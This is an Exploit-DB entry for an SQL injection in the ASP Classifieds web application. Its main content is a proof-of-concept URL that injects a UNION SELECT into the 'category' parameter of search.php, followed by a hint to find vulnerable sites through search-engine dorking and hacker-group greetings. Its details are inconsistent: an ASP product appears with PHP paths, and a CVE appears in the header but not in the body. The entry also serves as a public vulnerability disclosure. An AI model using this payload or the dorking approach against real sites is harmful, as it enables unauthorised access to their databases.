ASP Classifieds - SQL Injection

EDB-ID:

18613

CVE:

2007-2675

EDB Verified:

Author:

r45c4l

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2012-03-17

Vulnerable App:

# Exploit Title: ASP Classifieds Sql Injection
# Date: 17/03/2012
# Author: r45c4l
# Email: infosecpirate@gmail.com
# Script url: http://preproject.com/pclasp/home/default.asp
# Version: N/A
# CVE : ()

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Product Description :

ASP Classifieds is one of the most customizable Classified ad program
that exist for ASP and Access. Unlimited Images , unlimited categories
and much much more makes it perfect for those who wants to set up a used
stamps classifieds to those wanting to show and sell real estates. 


Product Cost : 58$



=======================Exploit====================================
                      ---ICW---
                                        
                                        
                                        
[ EXPL0!T ]

SQL Injection
p0c -
http://SERVER/classi/search.php?category=[SQli]

PoC - 

http://SERVER/classi/search.php?category=-1+union+all+select+version()--

[Note: Tested on demo website]

d0rk - use your brain ;)

===========================================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0,
Hoody, sam

All members of ICW, AH and darkc0de, and all Indian Hackers



Special Greetz to : b4ltazar and s1nner_01


=== End () ====

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services